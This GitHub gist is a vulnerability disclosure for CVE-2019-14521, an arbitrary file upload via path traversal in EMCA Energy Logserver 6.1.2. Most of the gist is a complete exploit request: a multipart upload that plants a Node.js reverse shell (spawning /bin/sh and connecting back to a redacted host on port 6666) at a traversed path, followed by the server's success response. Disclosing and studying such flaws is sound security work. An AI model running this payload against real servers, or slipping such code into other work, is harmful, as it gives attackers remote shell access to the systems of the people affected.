Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2019-14521 - Arbitrary File Upload
The Logo File upload feature in EMCA Energy Logserver 6.1.2 allows attackers to send any kind of file to any location on the server via path traversal in the filename parameter.
To exploit vulnerability, attacker has to change "filename" parameter and put malicious content into file (for example - reverse shell in node.js). Attacker can use path traversal to locate file anywhere.
Request to the server:
POST /api/admin/logoupload HTTP/1.1
Host: XXXXXXXXXXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/app/login
kbn-version: 6.2.4
X-Csrf-Token: QSNZ7g3HUTZv1MniVh8bj4IaPQUL81Px
Content-Type: multipart/form-data; boundary=---------------------------653820859933555141363061488
Content-Length: 740
Connection: close
Cookie: sid-auth=Fe26.2**25296dc9fce823a993d01f0601a72154aa2ade42ea9004b8cc051d3961daf0a6*OpTLWQDkfk-6Fv4WTfzyCw*LM28Nb1W9gHPy4n9s5j-O4r9rNlHItji9PvhMxcBMMWz69Oi2rwKW5K21vwxAWlm4Q4n8aV9G7237zYLOb4HVA**3e5e132a726bac22877c5ea51d31c9c2d88b9eddd11e592ff0bcb13e0ddba8fd*wcNSqH9a462TDoXfH9DTugUIwoFQ7_G3lqpSCZRhJWk
-----------------------------653820859933555141363061488
Content-Disposition: form-data; name="file"; filename="rshell.js"
Content-Type: text/html
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(6666, "XXXXXXXXXXX", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();
-----------------------------653820859933555141363061488
Content-Disposition: form-data; name="filename"
../../../../rshell.js
-----------------------------653820859933555141363061488--
Response from the server:
HTTP/1.1 200 OK
kbn-name: kibana
kbn-version: 6.2.4
content-type: text/html; charset=utf-8
cache-control: no-cache
vary: accept-encoding
Date: XXXXXXXXXXXXX
Connection: close
Content-Length: 21
Successfully uploaded
Maciej Domanski / AFINE.com team
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.